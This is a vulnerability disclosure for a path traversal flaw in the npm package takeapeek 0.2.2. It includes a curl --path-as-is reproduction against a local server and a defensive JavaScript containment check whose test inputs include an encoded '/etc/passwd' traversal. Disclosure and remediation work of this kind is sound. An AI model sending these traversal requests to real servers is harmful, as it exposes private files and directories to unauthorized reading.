I would like to report a path traversal in takeapeek.
It allows an attacker to list directories and files.
module name: takeapeek
version: 0.2.2
npm page: https://www.npmjs.com/package/takeapeek
A simple static webserver with only one command. Heavily inspired by glance, this is really more of a learning experience than anything.
~100 downloads per month
An attacker was able to exploit path traversal and view sensitive directories and files.
npm i takeapeek
node node_modules/takeapeek/dist/bin.js
curl --path-as-is http://localhost:3141/../../../../../../
It allows an attacker to list directories and files.
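For reference, a containment check that a static file server can apply before touching the filesystem, so that a raw target such as the `/../../../../../../` sent with `curl --path-as-is` is rejected. This is an added example, not takeapeek's code; the function name `resolveUnderRoot` and the root `/srv/www` are assumptions made for illustration.

```javascript
const path = require('node:path');

// Hypothetical helper (not part of takeapeek): map a raw request target to a
// path under `root`, or return null when the request would leave `root`.
function resolveUnderRoot(root, rawTarget) {
  const rootAbs = path.resolve(root);
  // Drop query string and fragment, then percent-decode exactly once.
  let pathname = rawTarget.split(/[?#]/, 1)[0];
  try {
    pathname = decodeURIComponent(pathname);
  } catch {
    return null; // malformed percent-encoding
  }
  if (pathname.includes('\0')) return null; // NUL bytes never belong in a path
  // Treat backslashes as separators so "..\" is caught on every platform.
  pathname = pathname.replace(/\\/g, '/');
  // The "./" prefix stops an absolute-looking pathname from replacing the root.
  const candidate = path.resolve(rootAbs, './' + pathname);
  // Containment test on the normalized result, not on the raw string.
  const rel = path.relative(rootAbs, candidate);
  if (rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel)) {
    return null;
  }
  return candidate;
}

// Constructed sample requests, including the one from the report.
const SAMPLE_ROOT = '/srv/www';
for (const target of [
  '/index.html',
  '/css/../index.html',
  '/../../../../../../',
  '/%2e%2e/%2e%2e/etc/passwd',
]) {
  const resolved = resolveUnderRoot(SAMPLE_ROOT, target);
  console.log(target, '->', resolved === null ? 'rejected (403)' : resolved);
}
```

The check is purely lexical: a symlink inside the served directory can still point outside it, so a server that follows symlinks should also compare `fs.realpathSync` of the candidate against the real root.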